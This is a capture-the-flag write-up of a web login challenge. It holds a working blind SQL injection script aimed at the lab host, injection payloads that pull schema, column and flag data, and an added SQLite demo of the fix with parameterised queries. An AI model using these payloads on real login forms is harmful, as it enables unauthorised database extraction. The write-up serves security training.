![b92891152de71b64fe8c98b10dd9d5e9.png](a0d32edf2beb46fe986bd6fc95f03dc5.png)

We're given a login form with nothing else to go on. Testing the form, we get different errors depending on what we enter:

- `admin:password` = `The password you entered was not valid`
- `admin':password` = nothing (blank response)
- `admin'-- :password` = `The password you entered was not valid`

A bare quote breaks the query and returns nothing, while commenting out the rest of the query brings the normal error back. Looks like boolean-based blind SQLi: the username is spliced straight into the query, and the "password not valid" message tells us whether the injected condition held.

Using this script, we're able to pull the database name one character at a time:

```
import requests
import string

url = 'http://c0ntrol.threatsims.com:8888/'
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
}

found_chars = ''
while True:
    matched = False
    for i in string.printable:
        # Compare the next prefix of database() against what we have so far plus one candidate char.
        data = {
            "username": f"admin' AND substring(database(),1,{len(found_chars) + 1})='{found_chars + i}'#",
            "password": "as",
            "submit": ""
        }
        print('Trying ' + found_chars + i)
        r = requests.post(url, data=data, headers=headers)
        # The "password not valid" message only appears when the AND condition is true,
        # i.e. the admin row was still selected.
        if 'The password you entered was not valid.' in r.text:
            print('Hit ' + i)
            found_chars += i
            matched = True
            break
    if not matched:
        # No candidate extended the prefix, so the full value has been recovered.
        print('Result: ' + found_chars)
        break
```

The database name is **ecorpdb**.

To get the table(s), we can use this injection in our script:

```
"username": f"admin' AND (substr((select table_name from information_schema.tables where table_schema='ecorpdb' limit 0,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#",
```

Table name is **users**.

To get the columns, we can use this injection in our script:

```
"username": f"admin' AND (substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#",
```

Columns are **flag**, **id** and **password**.

To get the data out of the columns, we can use this injection in our script:

```
"username": f"admin' AND (substr((select flag from users limit 0,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#",
```

This gives us the flag: `flag{g00d_ol_l0gin_sqli}`

---

Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]

Tags: #ctf #web #sqli #boolean-blind

Related:
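As an added illustration (not part of the original write-up or the challenge's code), here is the login bug from above reproduced against a constructed in-memory SQLite table, with the string-built query beside a parameterised one. The table, its rows and the `--` comment (SQLite's equivalent of the MySQL `#` used in the write-up) are assumptions; the point is that only the string-built version answers the two probes differently.

```python
import sqlite3

# Constructed stand-in for the challenge's ecorpdb.users table (sample rows only, not the real data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, flag TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cret!', 'flag{sample_not_real}')")
    conn.commit()
    return conn

NOT_VALID = "The password you entered was not valid."
NO_USER = "Unknown user."
BLANK = ""  # the empty response the write-up saw for a bare admin'

def login_vulnerable(conn, username, password):
    """String-built query: the username can close the literal and append its own SQL."""
    sql = f"SELECT password FROM users WHERE username='{username}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return BLANK  # broken syntax -> blank page
    if row is None:
        return NO_USER
    return "ok" if row[0] == password else NOT_VALID

def login_fixed(conn, username, password):
    """Parameterised query: the driver passes the username as data, never as SQL text."""
    row = conn.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    if row is None:
        return NO_USER
    return "ok" if row[0] == password else NOT_VALID

# The write-up's probe pair, adapted to SQLite syntax (assumed -- instead of MySQL's #).
TRUE_PROBE = "admin' AND substr((SELECT flag FROM users LIMIT 1),1,1)='f'--"
FALSE_PROBE = "admin' AND substr((SELECT flag FROM users LIMIT 1),1,1)='z'--"

def oracle_leaks(login):
    """True when the true/false probes get different responses, i.e. a boolean oracle exists."""
    conn = make_db()
    return login(conn, TRUE_PROBE, "x") != login(conn, FALSE_PROBE, "x")

if __name__ == "__main__":
    print("vulnerable leaks:", oracle_leaks(login_vulnerable))  # True
    print("fixed leaks:     ", oracle_leaks(login_fixed))       # False
```

With the parameterised query both probes fall into the "unknown user" path, so the response no longer depends on the injected condition and character-by-character extraction has nothing to read.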